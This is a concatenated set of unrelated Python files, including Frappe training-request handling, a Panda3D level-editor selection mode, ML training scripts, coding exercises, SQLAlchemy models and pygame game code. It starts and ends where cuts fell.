"Unforced Training":["/templates/training_templates/training_request_notification.html", get_central_delivery() ]
}
template = request_type_dict.get(self.request_type)[0]
recipients = request_type_dict.get(self.request_type)[1]
self.create_answer_sheet()
self.send_mail(template, recipients)
def create_answer_sheet(self):
as_data = frappe.get_doc("Assessment", {"name":self.assessment})
new_as_data = self.get_assessment_dict(as_data)
ans_key = frappe.new_doc("Answer Sheet")
ans_key.answer_sheet_status = "New"
ans_key.student_name = self.training_requester
ans_key.training_subscription = self.name
ans_key.update(new_as_data)
ans_key.save(ignore_permissions=1)
def get_assessment_dict(self, as_data):
return {
"total_questions":as_data.get("total_questions"),
"total_marks":as_data.get("total_marks"),
"table_5":as_data.get("table_5"),
"training_name":as_data.get("training_name"),
"assessment_evaluator":as_data.get("assessment_evaluator"),
"subjective_flag":as_data.get("subjective_flag")
}
def reject_request(self):
self.request_status = "Rejected"
template = "/templates/training_templates/training_request_notification.html"
self.send_mail(template)
def send_mail(self, template, recipients):
subject = "Training Document Notification"
first_nm, last_nm = frappe.db.get_value("User", {"name":self.training_requester}, ["first_name", "last_name"])
args = {"training_name":self.training_name, "cd":frappe.session.user, "first_name":first_nm,
"last_name":last_nm if last_nm else "", "comments":self.central_delivery_comments, "status":self.request_status }
frappe.sendmail(recipients= recipients, sender=None, subject=subject,
message=frappe.get_template(template).render(args))
|
from panda3d.core import CollisionBox, CollisionNode, BitMask32, CollisionHandlerQueue, TransformState, BitMask32
from bsp.leveleditor.DocObject import DocObject
from .SelectionType import SelectionType, SelectionModeTransform
from bsp.leveleditor.menu.KeyBind import KeyBind
from bsp.leveleditor.math.Line import Line
from bsp.leveleditor.actions.Select import Select, Deselect
from bsp.leveleditor import LEUtils, LEGlobals
class SelectionMode(DocObject):
Type = SelectionType.Nothing
# Collision mask used for the mouse click ray
Mask = 0
# The key to locate the object from what we clicked on
Key = None
# Can we delete the selected objects?
CanDelete = True
# Can we clone/duplicate the selected objects?
CanDuplicate = True
# What kinds of transform can we apply?
TransformBits = SelectionModeTransform.All
ToolOnly = True
def __init__(self, mgr):
DocObject.__init__(self, mgr.doc)
self.mgr = mgr
self.enabled = False
self.activated = False
self.properties = None
self.entryIdx = 0
self.lastEntries = None
def toggleSelect(self, theObj, appendSelect):
if isinstance(theObj, list):
obj = theObj[0]
objs = theObj
else:
obj = theObj
objs = [obj]
selection = []
anyAlreadySelected = False
for o in objs:
if not self.mgr.isSelected(obj):
selection.append(o)
else:
anyAlreadySelected = True
if not appendSelect:
if len(selection) > 0:
base.actionMgr.performAction("Select %s" % obj.getName(), Select(selection, True))
else:
# In multi-select (shift held), if the object we clicked on has
# already been selected, deselect it.
if anyAlreadySelected:
base.actionMgr.performAction("Deselect %s" % obj.getName(), Deselect(objs))
elif len(selection) > 0:
base.actionMgr.performAction("Append select %s" % obj.getName(), Select(selection, False))
def getActualObject(self, obj, entry):
return obj
def getObjectsUnderMouse(self):
vp = base.viewportMgr.activeViewport
if not vp:
return []
entries = vp.click(self.Mask)
if not entries or len(entries) == 0:
return []
objects = []
key = self.Key
for i in range(len(entries)):
# Our entries have been sorted by distance, so use the first (closest) one.
entry = entries[i]
np = entry.getIntoNodePath().findNetPythonTag(key)
if not np.isEmpty():
# Don't backface cull if there is a billboard effect on or above this node
if entry.hasSurfaceNormal() and not LEUtils.hasNetBillboard(entry.getIntoNodePath()):
surfNorm = entry.getSurfaceNormal(vp.cam).normalized()
rayDir = entry.getFrom().getDirection().normalized()
if surfNorm.dot(rayDir) >= 0:
# Backface cull
continue
obj = np.getPythonTag(key)
actual = self.getActualObject(obj, entry)
objects.append((actual, entry))
return objects
def cycleNextSelection(self, appendSelect = False):
if len(self.lastEntries) == 0:
return
self.entryIdx = (self.entryIdx + 1) % len(self.lastEntries)
self.toggleSelect(self.lastEntries[self.entryIdx][0], appendSelect)
def cyclePreviousSelection(self, appendSelect = False):
if len(self.lastEntries) == 0:
return
self.entryIdx = (self.entryIdx - 1) % len(self.lastEntries)
self.toggleSelect(self.lastEntries[self.entryIdx][0], appendSelect)
def selectObjectUnderMouse(self, appendSelect = False):
objects = self.getObjectsUnderMouse()
self.lastEntries = objects
self.entryIdx = 0
if len(objects) > 0:
self.toggleSelect(objects[0][0], appendSelect)
return objects[0][0]
return None
def getObjectsInBox(self, mins, maxs):
objects = []
# Create a one-off collision box, traverser, and queue to test against all MapObjects
box = CollisionBox(mins, maxs)
node = CollisionNode("selectToolCollBox")
node.addSolid(box)
node.setFromCollideMask(self.Mask)
node.setIntoCollideMask(BitMask32.allOff())
boxNp = self.doc.render.attachNewNode(node)
queue = CollisionHandlerQueue()
base.clickTraverse(boxNp, queue)
queue.sortEntries()
key = self.Key
entries = queue.getEntries()
# Select every MapObject our box intersected with
for entry in entries:
np = entry.getIntoNodePath().findNetPythonTag(key)
if not np.isEmpty():
obj = np.getPythonTag(key)
actual = self.getActualObject(obj, entry)
if isinstance(actual, list):
for a in actual:
if not any(a == x[0] for x in objects):
objects.append((a, entry))
else:
objects.append((actual, entry))
boxNp.removeNode()
return objects
def selectObjectsInBox(self, mins, maxs):
objects = self.getObjectsInBox(mins, maxs)
if len(objects) > 0:
base.actionMgr.performAction("Select %i objects" % len(objects), Select([x[0] for x in objects], True))
def deselectAll(self):
self.lastEntries = None
self.entryIdx = 0
if base.selectionMgr.hasSelectedObjects():
base.actionMgr.performAction("Deselect all", Deselect(all = True))
def deleteSelectedObjects(self):
base.selectionMgr.deleteSelectedObjects()
def cleanup(self):
self.mgr = None
self.enabled = None
self.activatated = None
self.properties = None
self.lastEntries = None
self.entryIdx = None
DocObject.cleanup(self)
def enable(self):
self.enabled = True
self.activate()
def activate(self):
self.activated = True
if not self.ToolOnly:
self.__activate()
def disable(self):
self.enabled = False
self.toolDeactivate()
self.deactivate()
def deactivate(self, docChange = False):
if not self.ToolOnly:
self.__deactivate()
def toolActivate(self):
if self.ToolOnly:
self.__activate()
def toolDeactivate(self):
if self.ToolOnly:
self.__deactivate()
def __activate(self):
if self.CanDelete:
base.menuMgr.connect(KeyBind.Delete, self.deleteSelectedObjects)
self.updateModeActions()
if self.properties and self.doc.toolMgr:
base.toolMgr.toolProperties.addGroup(self.properties)
self.properties.updateForSelection()
self.accept('selectionsChanged', self.onSelectionsChanged)
def __deactivate(self):
if self.CanDelete:
base.menuMgr.disconnect(KeyBind.Delete, self.deleteSelectedObjects)
self.activated = False
self.lastEntries = None
self.entryIdx = 0
if self.properties and self.doc.toolMgr:
base.toolMgr.toolProperties.removeGroup(self.properties)
self.ignoreAll()
def updateModeActions(self):
if self.CanDelete:
if len(self.mgr.selectedObjects) == 0:
base.menuMgr.disableAction(KeyBind.Delete)
else:
base.menuMgr.enableAction(KeyBind.Delete)
def onSelectionsChanged(self):
self.updateModeActions()
if self.properties:
self.properties.updateForSelection()
def getProperties(self):
return self.properties
# Returns a list of objects that will be selected
# when switching to this mode from prevMode.
def getTranslatedSelections(self, prevMode):
return []
|
# -*- coding: utf-8 -*-
import tensorflow as tf
# 定义一个简单的计算图,实现向量加法的操作
input1 = tf.constant([1.0,2.0,3.0],name="input1")
input2 = tf.Variable(tf.random_uniform([3]),name="input2")
output = tf.add_n([input1,input2],name="add")
# writer = tf.train.SummaryWriter("/path/to/log",tf.get_default_graph())
writer = tf.summary.FileWriter("/temp/to/log",tf.get_default_graph())
writer.close()
|
def howSum(targetSum, numbers):
if(targetSum == 0):
return []
if(targetSum < 0):
return None
for num in numbers:
remainder = targetSum - num
remainderResult = howSum(remainder, numbers)
if (remainderResult is not None):
remainderResult.append(num)
return remainderResult
return None
print(howSum(7, [2,3]))
print(howSum(7, [5,3,4,7]))
print(howSum(7, [2,4]))
'''The above method doesnt work for larger array or if the targetSum is very large'''
'''m = targetSum, n = numbers length
Time Complexity: O(n^m * m)
the extra m in TC is because of the appending
Space complexity: O(m)'''
#Method 2 - Memoization
def howSum2(targetSum, numbers, memo = None):
if memo is None:
memo = {}
if targetSum in memo:
return memo[targetSum]
if targetSum == 0:
return []
if targetSum < 0:
return None
for num in numbers:
remainder = targetSum - num
remainderResult = howSum2(remainder, numbers, memo)
if remainderResult is not None:
remainderResult.append(num)
memo[targetSum] = remainderResult
return memo[targetSum]
memo[targetSum] = None
return memo[targetSum]
print(howSum2(7, [2,3]))
print(howSum2(7, [5,3,4,7]))
print(howSum2(7, [2,4]))
print(howSum2(8, [2,3,5]))
#print(howSum2(300, [14,7,10,2]))
"""Time complexity: O(n * m^2)
Space complexity: O(m * m) = O(m^2)"""
# Tabulation method
def howSumt(targetSum, numbers):
table = [None] * (targetSum + 1)
table[0] = []
for i in range(targetSum + 1):
if table[i] is not None:
numbers = [num for num in numbers if i+num <=targetSum]
for num in numbers:
table[i+num] = table[i] + [num]
return table[targetSum]
print(howSumt(7, [5,3,4]))
print(howSum2(7, [2,4]))
print(howSum2(300, [14,7,10,2]))
'''
Time Complexity: O(m^2 * n)
Space Complexity: O(m^2)
'''
|
from csslib import css
CSS = css.CSS3("$favcol:purple;/* comment */body{background-color:$favcol;}") # input as string
CSS.parse() # parses string
# __help__ for help
print CSS.get("__comments__") # gets the comments of the css
print CSS.get("__tree__") # gets complete tree
print CSS.get("__vars__") # gets the variables of the css
print CSS.getItem("body") # gets an item with the name
# CSS.getIds() gets all ids
# CSS.getClasses gets all classes
# CSS.getAllStartWith(<startswith>) gets all items that start with <startswith>
|
import os
import sys
import holoviews as hv
import pandas as pd
from rubicon_ml import Rubicon
from rubicon_ml.exceptions import RubiconException
def get_or_create_project(rubicon, name):
try:
project = rubicon.create_project(name)
except RubiconException:
project = rubicon.get_project(name)
return project
def log_rubicon(path):
project_name = "intake-rubicon unit testing"
if os.path.exists(os.path.join(path, "projects", project_name)):
return
rubicon = Rubicon(persistence="filesystem", root_dir=path)
project = get_or_create_project(rubicon, project_name)
experiment_a = project.log_experiment(name="experiment_a", tags=["model-a", "y"])
experiment_a.log_feature("year")
experiment_a.log_feature("credit score")
experiment_b = project.log_experiment(name="experiment_b", tags=["model-b", "y"])
experiment_b.log_feature("year")
experiment_b.log_feature("credit score")
experiment_a.log_parameter("random state", 13243546)
experiment_a.log_parameter("test size", "10 GB")
experiment_a.log_parameter("n_estimators", 20)
experiment_a.log_metric("Accuracy", "99")
experiment_a.log_metric("AUC", "0.825")
df = pd.DataFrame([[1, 2, 3], [2, 1, 2], [3, 2, 1]], columns=["x", "y", "z"])
dataframe = experiment_a.log_dataframe(df, tags=["x", "y"])
plot = dataframe.plot(kind="bar")
plot_path = f"{path}/plot.png"
hv.save(plot, plot_path, fmt="png")
project.log_artifact(data_path=plot_path, description="bar plot logged with path")
with open(plot_path, "rb") as f:
source_data = f.read()
project.log_artifact(
data_bytes=source_data,
name="plot.png",
description="bar plot logged with bytes",
)
with open(plot_path, "rb") as f:
project.log_artifact(data_file=f, name="plot.png", description="bar plot logged with file")
if __name__ == "__main__":
here = os.path.dirname(__file__)
path = os.path.join(here, "data")
sys.exit(log_rubicon(path))
|
import numpy as np
from random import shuffle
import sys
import tensorflow as tf
from tensorflow.image import decode_jpeg, resize
from tensorflow.io import read_file
from tensorflow.nn import softmax, sparse_softmax_cross_entropy_with_logits
from tensorflow.train import AdamOptimizer
tf.compat.v1.enable_eager_execution() # Remove when switching to tf2
from constants import image_size, nb_class
from classifier import Classifier
from preprocess import get_classification_data
from tracking import save_data
weights_path = "./weights/weights"
def get_model():
classifier = Classifier()
random_image = tf.convert_to_tensor(np.random.random((1, image_size, image_size, 3)), dtype=np.float32)
classifier(random_image)
classifier.load_weights(weights_path)
return classifier
def reset_model():
classifier = Classifier()
random_image = tf.convert_to_tensor(np.random.random((1, image_size, image_size, 3)), dtype=np.float32)
classifier(random_image)
classifier.save_weights(weights_path)
def get_img(img_path):
img = read_file(img_path)
img = decode_jpeg(img, channels=3)
img = resize(img, [image_size, image_size])
img = img/255.0
return img
def train():
classifier = get_model()
opt = AdamOptimizer(1e-5)
images_data = get_classification_data("../data/data_classification_train.json")
count = 0
print("Training started")
shuffle(images_data)
for (i, label) in images_data:
img = get_img("../pictures/pictures_classification_train/{}.png".format(i))
def get_loss():
img_vector = tf.convert_to_tensor([img], dtype=np.float32)
logits = classifier(img_vector)
entropy = sparse_softmax_cross_entropy_with_logits(labels=[label], logits=logits)
entropy = tf.gather(entropy, 0)
save_data(label, logits[0].numpy().tolist(), entropy.numpy().tolist())
return entropy
opt.minimize(get_loss)
count += 1
if (count % 1000 == 0):
classifier.save_weights(weights_path)
print("Weights saved")
classifier.save_weights(weights_path)
print("Weights saved")
def evaluate(num):
classifier = get_model()
images_data = get_classification_data("../data/data_classification_evaluate_{}.json".format(num))
count = 0
succeeds = [0] * nb_class
total = [0] * nb_class
for (i, label) in images_data:
img = get_img("../pictures/pictures_classification_evaluate_{}/{}.png".format(num, i))
img_vector = tf.convert_to_tensor([img], dtype=np.float32)
logits = classifier(img_vector).numpy()[0]
total[label] += 1
if (np.argmax(logits) == label):
succeeds[label] += 1
count += 1
print(" {} {}".format(label, logits.tolist()))
else:
print("X {} {}".format(label, logits.tolist()))
print("Number of probs where label prob is the max: {}/{}".format(count, len(images_data)))
for label in range(nb_class):
print("Label {}: {}/{}".format(label, succeeds[label], total[label]))
instruction = None
if len(sys.argv) > 1:
instruction = sys.argv[1]
param = None
if len(sys.argv) > 2:
param = sys.argv[2]
if (instruction == "reset"):
reset_model()
elif (instruction == "train"):
train()
elif (instruction == "evaluate"):
if (param == "100") | (param == "10000"):
evaluate(param)
else:
print("Usage: 'python main.py evaluate [100, 10000]'")
else:
print("Usage: 'python main.py [train, evaluate, reset]'")
|
class Metacls(type):
@classmethod
def __new__(mcs, *args, **kwargs):
# make a new class object from mcs
print(f"META __new__ : {mcs} with:{args} - {kwargs}")
# returns a class
return super().__new__(*args, **kwargs)
def __init__(cls, *args, **kwargs):
# initialize the cls
print(f"META __init__ : {cls} with:{args} - {kwargs}")
# returns None
super().__init__(*args, **kwargs)
def __call__(cls, *args, **kwargs):
# make an instance of a cls - a call on the class
print(f"META __call__ : {cls} with: {args} - {kwargs}")
# returns an instance of cls
return super().__call__(*args, **kwargs)
class Base(metaclass=Metacls):
@classmethod
def __new__(cls, *args, **kwargs):
# make a new instance object of cls
print(f"CLASS __new__ : {cls} with: {args} - {kwargs}")
# returns an instance of cls
return super().__new__(*args, **kwargs)
def __init__(self, *args, **kwargs):
# initialize the instance self
print(f"CLASS __init__ : {self} with: {args} - {kwargs}")
# returns None
super().__init__(*args, **kwargs)
def __call__(self, *args, **kwargs):
# a call on the instance
print(f"CLASS __call__ : {self} with: {args} - {kwargs}")
# can return anything or None
return
instance = Base()
value = instance()
|
if __name__ == '__main__':
from andrew_packages.programming_problems.greedy.bandtexts_problem.method1 import RandomLengths
size = 20
text_lengths = RandomLengths(size)
print("Initial data:")
print(text_lengths)
import matplotlib.pyplot as plt
plt.plot(text_lengths)
plt.show()
# generating opposite waves
wave1 = [text_lengths[index] for index in range(0, len(text_lengths), 2)]
wave2 = [text_lengths[index] for index in range(1, len(text_lengths), 2)]
from andrew_packages.util.algorithms import Sorting
sort = Sorting()
sort.QuickSort(wave1)
sort.QuickSort(wave2, reverse=True)
solution = []
for item_ascending, item_descending in zip(wave1, wave2):
solution.append(item_ascending)
solution.append(item_descending)
print("Optimal order for texts is:")
print(solution)
|
import sys
import os
import sqlalchemy
import datetime
from sqlalchemy import Column, ForeignKey, Integer, String, Text, DateTime, BigInteger
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import create_engine
from flask_login import UserMixin
Base = declarative_base()
class User(UserMixin, Base):
__tablename__ = 'user'
id = Column(
Integer, primary_key = True)
name_first = Column(
String(80))
name_last = Column(
String(80))
username = Column(
String(80))
p = Column(
String(80), nullable = False)
email = Column(
String(180), nullable = False)
follow = Column(
Text())
follwers = Column(
Text())
bio = Column(
Text())
profile_picture = Column(
String(150))
class Image(Base):
__tablename__ = 'image'
path = Column(
String(150), nullable = False)
id = Column(
Integer, primary_key = True)
user_id = Column(
Integer, ForeignKey('user.id'))
user = relationship (User)
heart_tot = Column(
Integer, default = 0)
laugh_tot = Column(
Integer, default = 0)
cry_tot = Column(
Integer, default = 0)
heart_usrs = Column(
Text())
laugh_usrs = Column(
Text())
cry_usrs = Column(
Text())
img_desc = Column(
Text())
# cmt_tot = Column(
# Integer, default = 0)
class Cmts(Base):
__tablename__ = 'cmts'
id = Column(
Integer, primary_key = True)
img_id = Column(
Integer, ForeignKey('image.id'))
image = relationship(Image)
cmt_owner = Column(
Integer, ForeignKey('user.id'))
user = relationship(User)
cmt = Column(
Text())
engine = create_engine('sqlite:///up.db')
Base.metadata.create_all(engine)
|
import pygame
from bullet_patterns.no_scope import NoScope
from bullet_alien import BulletAlienCinco
class Cyclone(NoScope):
"""A derivative of the NoScope class"""
def __init__(self, main_game, shooter):
super().__init__(main_game, shooter)
self.bullets_per_ring = self.settings.nope_bullets_ring * 2.5
self.angle = 360 // self.bullets_per_ring
self.bullet_cooldown = self.settings.cyclone_bullet_cooldown
self.cyclone_time = self.settings.cyclone_time
self.start_time = pygame.time.get_ticks()
self.angle_increment = self.angle
self.no_scope = NoScope(main_game, shooter)
self.cyclone = True
self.confirmed_start = True
def shoot_burst(self):
"""Shoot the boolet in burst of straight line. Do it like the alien_movement cooldown"""
self._check_cyclone_time()
"""yeah, I have to check if any bursts left to move onto next pattern"""
if self.cyclone:
self._check_bullet_cooldown()
if not self.shoot_disabled:
# Shoot a bullet and then disable the shooting ability until cooldown
self.shoot_boolet()
self.last_bullet_fired = pygame.time.get_ticks()
self.bullets_left -= 1
self.angle -= self.angle_increment
self.shoot_disabled = True
else:
self.no_scope.shoot_burst()
def shoot_boolet(self):
"""A cyclone of bullets"""
bullet = BulletAlienCinco(self.main_game, shooter=self.shooter)
bullet.vector[0] = 0
bullet.vector[1] = 1
bullet.normalized_vector = bullet.vector.normalize()
bullet.normalized_vector = bullet.normalized_vector.rotate(self.angle)
self.main_game.alien_bullets.add(bullet)
def _check_bullet_cooldown(self):
"""Yeah, I don't want it to turn into a lazer beam of ultimate lethality"""
now = pygame.time.get_ticks()
if now - self.last_bullet_fired >= self.bullet_cooldown:
self.shoot_disabled = False
def _check_cyclone_time(self):
now = pygame.time.get_ticks()
if self.confirmed_start:
self.start_time = pygame.time.get_ticks()
self.confirmed_start = False
if now - self.start_time >= self.cyclone_time:
self.cyclone = False
def reset(self):
# Flags to use in tandem with cooldown
self.cyclone = True # This for delay between burst
self.shoot_disabled = False # This is for boolet's delay
self.confirmed_start = True
self.angle = 0
# Imported from settings.py
self.start_time = pygame.time.get_ticks()
self.last_bullet_fired = pygame.time.get_ticks()
# Dynamic bullet_count and burst_count
self.bullets_left = self.bullets_per_burst
|
import numpy as np
from matplotlib import pyplot as plt
import pandas as pd
from sklearn.tree import DecisionTreeClassifier
dataset = pd.read_csv("C:/Users/Sarthak/Downloads/train.csv")
#print(data)
clf = DecisionTreeClassifier()
#Training Datasets
xtrain = dataset.iloc[0:21000,1:].values
train_label = dataset.iloc[0:21000,0].values
clf.fit(xtrain, train_label)
#Testing Data
xtest = dataset.iloc[21000:,1:].values
actual_label = dataset.iloc[21000:,0].values
#sample data
d = xtest[8] #can use any index below 42000
d.shape = (28,28)
plt.imshow(255-d,cmap = "gray") #we have 255-d because I want white background with black colour
plt.show()
print(clf.predict([xtest[8]]))
#accuracy
p = clf.predict([xtest]) #can't pass d because it only takes single row vector
count = 0
for i in range(0,21000):
count += 1
if p[i]:
print(actual_label[i])
else:
print("0")
print("ACCURACY", (count/21000)*100)
|
import datetime
import unittest
from zoomus import components, util
import responses
def suite():
"""Define all the tests of the module."""
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(PollsV2TestCase))
return suite
class PollsV2TestCase(unittest.TestCase):
def setUp(self):
self.component = components.past_webinar.PastWebinarComponentV2(
base_uri="http://www.foo.com",
config={"version": util.API_VERSION_2, "token": "token"},
)
@responses.activate
def test_can_list(self):
responses.add(
responses.GET, "http://www.foo.com/past_webinars/ID/polls",
)
self.component.get_polls(webinar_id="ID")
expected_headers = {"Authorization": "Bearer token"}
actual_headers = responses.calls[0].request.headers
self.assertTrue(
set(expected_headers.items()).issubset(set(actual_headers.items()))
)
if __name__ == "__main__":
unittest.main()
|
import torch
from tqdm import tqdm
from utils.utils import get_lr
def fit_one_epoch(model_train, model, yolo_loss, loss_history, optimizer, epoch, epoch_step, epoch_step_val, gen, gen_val, Epoch, cuda):
loss = 0
val_loss = 0
model_train.train()
print('Start Train')
with tqdm(total=epoch_step,desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen):
if iteration >= epoch_step:
break
images, targets = batch[0], batch[1]
with torch.no_grad():
if cuda:
images = torch.from_numpy(images).type(torch.FloatTensor).cuda()
targets = [torch.from_numpy(ann).type(torch.FloatTensor).cuda() for ann in targets]
else:
images = torch.from_numpy(images).type(torch.FloatTensor)
targets = [torch.from_numpy(ann).type(torch.FloatTensor) for ann in targets]
#----------------------#
# 清零梯度
#----------------------#
optimizer.zero_grad()
hidden = model_train.init_hidden(images.shape[0])
#----------------------#
# 前向传播
#----------------------#
for p in range(model_train.p):
outputs,hidden = model_train.network(images,hidden)
loss_value_all = 0
num_pos_all = 0
#----------------------#
# 计算损失
#----------------------#
for l in range(len(outputs)):
loss_item, num_pos = yolo_loss(l, outputs[l], targets)
loss_value_all += loss_item
num_pos_all += num_pos
loss_value = loss_value_all / num_pos_all
#----------------------#
# 反向传播
#----------------------#
loss_value.backward()
optimizer.step()
loss += loss_value.item()
pbar.set_postfix(**{'loss' : loss / (iteration + 1),
'lr' : get_lr(optimizer)})
pbar.update(1)
print('Finish Train')
model_train.eval()
print('Start Validation')
with tqdm(total=epoch_step_val, desc=f'Epoch {epoch + 1}/{Epoch}',postfix=dict,mininterval=0.3) as pbar:
for iteration, batch in enumerate(gen_val):
if iteration >= epoch_step_val:
break
images, targets = batch[0], batch[1]
with torch.no_grad():
if cuda:
images = torch.from_numpy(images).type(torch.FloatTensor).cuda()
targets = [torch.from_numpy(ann).type(torch.FloatTensor).cuda() for ann in targets]
else:
images = torch.from_numpy(images).type(torch.FloatTensor)
targets = [torch.from_numpy(ann).type(torch.FloatTensor) for ann in targets]
#----------------------#
# 清零梯度
#----------------------#
optimizer.zero_grad()
#----------------------#
# 前向传播
#----------------------#
outputs = model_train(images)
loss_value_all = 0
num_pos_all = 0
#----------------------#
# 计算损失
#----------------------#
for l in range(len(outputs)):
loss_item, num_pos = yolo_loss(l, outputs[l], targets)
loss_value_all += loss_item
num_pos_all += num_pos
loss_value = loss_value_all / num_pos_all
val_loss += loss_value.item()
pbar.set_postfix(**{'val_loss': val_loss / (iteration + 1)})
pbar.update(1)
print('Finish Validation')
loss_history.append_loss(loss / epoch_step, val_loss / epoch_step_val)
print('Epoch:'+ str(epoch+1) + '/' + str(Epoch))
print('Total Loss: %.3f || Val Loss: %.3f ' % (loss / epoch_step, val_loss / epoch_step_val))
torch.save(model.state_dict(), 'logs/ep%03d-loss%.3f-val_loss%.3f.pth' % (epoch + 1, loss / epoch_step, val_loss / epoch_step_val))
|
inputFile = open("/Users/samuelcordano/Documents/adventOfCode/Day7_HandyHaversacks/inputFile.txt","r")
Lines = inputFile.readlines()
class bag:
def __init__(self,name,childBags,parentBags) -> None:
self.name = name
self.childBags= childBags
self.parentBags = parentBags
self.visited = False
def __str__(self):
#print(f"name: {self.name} | childBags: {self.childBags}| parentBags: {self.parentBags}| visited: {self.visited}")
return(f"name: {self.name} | childBags: {self.childBags}| parentBags: {self.parentBags}| visited: {self.visited}")
listOfBags = {}
def createGraph():
"""
For each group, count the number of questions to which anyone answered "yes". What is the sum of those counts?
"""
counter =0 #testing purposes
for line in Lines:
counter +=1
currentInput = line.strip()
#Clean Inputs
print(f"currentInput is: {currentInput}")
currentBag = currentInput.split(" bags")[0]
#currentBagName = currentBag.replace(" ", "_")
currentChildBags = currentInput.split(" contain ",1)[1]
currentChildBags = currentChildBags.replace(" bag.", " bags.")
currentChildBags = currentChildBags.split(" bags.")[0]
currentChildBags = currentChildBags.replace(" bag, ", " bags, ")
currentChildBags = currentChildBags.split(" bags, ")
currentChildBags = [element[2:] for element in currentChildBags]
print(f"currentBag is: {currentBag}")
print(f"childBags is: {currentChildBags}")
if currentChildBags == [" other"]:
currentChildBags = []
print(f"childBags new is: {currentChildBags}")
print(" ")
#Create objectfor current bag if it doesn't exist:
if currentBag in listOfBags:
currentBagObject = listOfBags.get(currentBag)
currentBagObject.childBags = currentChildBags
else:
listOfBags[currentBag] = bag(currentBag,currentChildBags,[])
#For each childbag, create an object if it isn't done and add current bag as a parentbag
for childBag in currentChildBags:
if childBag not in listOfBags:
listOfBags[childBag] = bag(childBag,[],[currentBag])
else:
currentChildBagObject = listOfBags.get(childBag)
currentChildBagObject.parentBags = currentChildBagObject.parentBags + [currentBag]
#if counter ==10:
# return True
listOfParentsShinyGold = []
def findAllParentBags(originalBag,listOfParentsShinyGold):
print(originalBag)
currentOriginalBagObject = listOfBags.get(originalBag)
listOfParentBags = currentOriginalBagObject.parentBags
for parentBag in listOfParentBags:
currentParentBagObject = listOfBags.get(parentBag)
if not currentParentBagObject.visited:
currentParentBagObject.visited = True
listOfParentsShinyGold += [parentBag]
findAllParentBags(parentBag,listOfParentsShinyGold)
createGraph()
print("TESTING")
for individualBag in listOfBags:
currentBagObject = listOfBags.get(individualBag)
print(currentBagObject)
findAllParentBags("shiny gold",listOfParentsShinyGold)
print(listOfParentsShinyGold)
print(len(listOfParentsShinyGold))
|
n = int(input())
positive_int = []
negative_int = []
for _ in range(n):
integer = int(input())
positive_int.append(integer) if integer >= 0 else negative_int.append(integer)
print(positive_int)
print(negative_int)
print(f"Count of positives: {len(positive_int)}. Sum of negatives: {sum(negative_int)}")
|
import argparse
def get_arguments():
parser = argparse.ArgumentParser()
#parser.add_argument('--mode', help='task to be done', default='train')
#load, input, save configurations:
parser.add_argument('--out',help='output folder for checkpoint',default='./log/lstm_gcn/')
parser.add_argument('--gap_save',help='gap between save model',default=50)
parser.add_argument('--data',help='the path to dataset',default="./dataset/dance_music_paired.json")
parser.add_argument('--pretrain_GCN',help='the pretrain GCN',default='./pretrain_model/GCN.pth')
#optimization hyper parameters:
parser.add_argument('--niter', type=int, default=800, help='number of epochs to train')
parser.add_argument('--batch_size', type=int, default=16, help='batch_size')
parser.add_argument('--lr_g', type=float, default=0.0003, help='learning rate')
parser.add_argument('--gap',help='train n iter if D while train 1 iter of G',default=1)
parser.add_argument('--lr_d_frame', type=float, default=0.0003, help='learning rate')
parser.add_argument('--lr_d_seq', type=float, default=0.0005, help='learning rate')
parser.add_argument('--lambda_grad',type=float, help='gradient penelty weight',default=1)
parser.add_argument('--alpha',type=float, help='reconstruction loss weight',default=200)
parser.add_argument('--encoder', type=str, help='gru, lstm, or tcn', default='gru')
parser.add_argument('--resume', action='store_true', help='load weights and continue training')
parser.add_argument('--gcn', action='store_true', help='use perceptual loss')
return parser
|
#!/usr/bin/python3
from sys import argv
res = 0
first = True
if __name__ == "__main__":
for num in argv:
if first:
first = False
else:
res = res + int(num)
print('{}'.format(res))
|
import pygame
import random
import decimal
import math
import time
import os
pygame.init()
width = 1466
height = 768
size = (width, height)
FPS = 120
WHITE = (255, 255, 255)
BLACK = (0, 0, 0)
myfont = pygame.font.SysFont('Comic Sans MS', 30)
angle = []
angle.append(10)
angle.append(24)
angle.append(44)
angle.append(73)
angle.append(73)
angle.append(44)
angle.append(24)
angle.append(10)
ballSpeed = 1
clicked = False
screen = pygame.display.set_mode(size)
pygame.display.set_caption("Rotating Factory Escape")
Clock = pygame.time.Clock()
homeScreenMode = [True, False]
global scoreModifier
global score
score = 0
scoreModifier = 50
global highscore
highscore = 0
global playerNum
playerNum = 0
pickPlayer = [False, True]
speed1 = 10
speed2 = 20
speed = 0
cheatMenu = False
playerSpeed = 8
beforeSpeed = playerSpeed
lost = False
doorHeight = height/2 - 100
global levelNum
levelNum = 0
exit = False
pygame.mixer.init()
game_folder = os.path.dirname("../../img")
MySpritesFolder = os.path.join(game_folder, "img")
gear = ["gear.png", "gear1.png", "gear2.png", "gear3.png", "gear4.png", "gear5.png", "gear6.png"]
back = ["back1.jpg","back2.jpg","back3.jpg","back4.jpg","back5.jpg","back6.jpg","back7.jpg","back8.jpg",\
"back9.jpg","back10.jpg","back11.jpg","back12.jpg","back13.jpg","back14.jpg","back15.jpg"]
players = ["player.png", "player1.png", "player2.png", "player3.png", "player4.png", "player5.png", "player6.png","player7.png", "player8.png", "player9.png"]
#---------------------------------HOMESCREEN CLASS-----------------------HOMESCREEN CLASS----------------------------------
class homeScreen(pygame.sprite.Sprite):
def __init__(self):
pygame.sprite.Sprite.__init__(self)
self.background = pygame.image.load(os.path.join(MySpritesFolder, "homeGear.jpg")).convert()
self.background_rect = self.background.get_rect()
screen.blit(self.background, self.background_rect)
self.playButton = pygame.image.load(os.path.join(MySpritesFolder, "play_200x100.png")).convert()
self.play_rect = self.playButton.get_rect()
self.play_rect.centerx = width / 2
self.play_rect.centery = height / 2
self.playButton.set_colorkey(WHITE)
screen.blit(self.playButton, self.play_rect)
self.title = pygame.image.load(os.path.join(MySpritesFolder, "title.png")).convert()
self.title_rect = self.title.get_rect()
self.title_rect.centerx = width / 2
self.title.set_colorkey(WHITE)
screen.blit(self.title, self.title_rect)
def update(self):
self.keystate = pygame.key.get_pressed()
if self.keystate[pygame.K_RETURN] or self.keystate[pygame.K_SPACE]:
pickPlayer.remove(False)
def choosePlayer(self):
self.image = pygame.Surface((width/len(players) * len(players) - width/len(players) + 80, (height/2)/len(players) * len(players) - (height/2)/len(players) -80))
